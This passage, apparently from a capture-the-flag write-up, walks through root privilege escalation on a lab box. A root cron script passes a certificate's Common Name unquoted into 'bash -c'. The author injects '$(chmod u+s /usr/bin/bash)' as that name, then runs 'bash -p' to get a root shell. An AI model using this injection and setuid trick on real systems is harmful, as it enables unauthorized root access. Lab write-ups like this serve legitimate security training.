Inotify reports only events that a user-space program triggers
through the filesystem API.  As a result, it does not catch
remote events that occur on network filesystems.  (Applications
must fall back to polling the filesystem to catch such events.)
Furthermore, various pseudo-filesystems such as /proc, /sys, and
/dev/pts are not monitorable with inotify.
```

Turns out, `pspy` actually uses the `procfs` API to get process information, and `inotify` API only acts as a cue to catch the processes as they are very short-lived.

After a while, I found that they had pushed a new release of `pspy` and that release worked without any issue:

```text
2023/02/22 09:34:01 CMD: UID=0     PID=11465  | /bin/bash /root/cron.sh 
2023/02/22 09:34:01 CMD: UID=0     PID=11466  | /bin/bash -c /opt/renew_cert.sh /home/bill/Certs/broscience.crt 
2023/02/22 09:34:01 CMD: UID=0     PID=11467  | /bin/bash /root/cron.sh 
2023/02/22 09:34:01 CMD: UID=0     PID=11468  | /usr/bin/rm -r /home/bill/Certs/. /home/bill/Certs/.. 
```

Aside from these, I also found cleanup cron jobs, but I think this is the vector for getting root.

## Getting root

Let us have a look at `renew_cert.sh` first:

```console
bill@broscience:~$ cat /opt/renew_cert.sh 
```

```bash
#!/bin/bash

if [ "$#" -ne 1 ] || [ $1 == "-h" ] || [ $1 == "--help" ] || [ $1 == "help" ]; then
    echo "Usage: $0 certificate.crt";
    exit 0;
fi

if [ -f $1 ]; then

    openssl x509 -in $1 -noout -checkend 86400 > /dev/null

    if [ $? -eq 0 ]; then
        echo "No need to renew yet.";
        exit 1;
    fi

    subject=$(openssl x509 -in $1 -noout -subject | cut -d "=" -f2-)

    country=$(echo $subject | grep -Eo 'C = .{2}')
    state=$(echo $subject | grep -Eo 'ST = .*,')
    locality=$(echo $subject | grep -Eo 'L = .*,')
    organization=$(echo $subject | grep -Eo 'O = .*,')
    organizationUnit=$(echo $subject | grep -Eo 'OU = .*,')
    commonName=$(echo $subject | grep -Eo 'CN = .*,?')
    emailAddress=$(openssl x509 -in $1 -noout -email)

    country=${country:4}
    state=$(echo ${state:5} | awk -F, '{print $1}')
    locality=$(echo ${locality:3} | awk -F, '{print $1}')
    organization=$(echo ${organization:4} | awk -F, '{print $1}')
    organizationUnit=$(echo ${organizationUnit:5} | awk -F, '{print $1}')
    commonName=$(echo ${commonName:5} | awk -F, '{print $1}')

    echo $subject;
    echo "";
    echo "Country     => $country";
    echo "State       => $state";
    echo "Locality    => $locality";
    echo "Org Name    => $organization";
    echo "Org Unit    => $organizationUnit";
    echo "Common Name => $commonName";
    echo "Email       => $emailAddress";

    echo -e "\nGenerating certificate...";
    openssl req -x509 -sha256 -nodes -newkey rsa:4096 -keyout /tmp/temp.key -out /tmp/temp.crt -days 365 <<<"$country
    $state
    $locality
    $organization
    $organizationUnit
    $commonName
    $emailAddress
    "2>/dev/null

    /bin/bash -c "mv /tmp/temp.crt /home/bill/Certs/$commonName.crt"
else
    echo "File doesnt exist"
    exit 1;
```

There is an obvious vulnerability in the 4th last line.  
We can control `$commonName`, so we might be able to inject OS commands.  

But first, there's another loose end we need to tie.  
The vulnerable section of code would run only if `openssl x509 -in $1 -noout -checkend 86400` has an exit code of 1.  
86400 seconds is 24 hours. `openssl` would warn and exit with a code of 1 even if the certificate expires in exactly 1 day.

We can generate the `broscience.crt`:

```console
opcode@parrot$ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 1 -out broscience.crt
```

When it asks for "Common Name", I entered `$(chmod u+s /usr/bin/bash)`  
Now, we can transfer the certificate to the box in the correct directory and wait.
After a while, we'd see:

```console
bill@broscience:~/Certs$ ls -la /usr/bin/bash
-rwsr-xr-x 1 root root 1234376 Mar 27  2022 /usr/bin/bash
```

Now, we can run `bash` with `-p` to not drop the effective user id:

```console
bill@broscience:~/Certs$ bash -p
bash-5.1# id
uid=1000(bill) gid=1000(bill) euid=0(root) groups=1000(bill)
```

After getting the flag, make sure to clean up:

```console
bash-5.1# chmod -s /usr/bin/bash
```
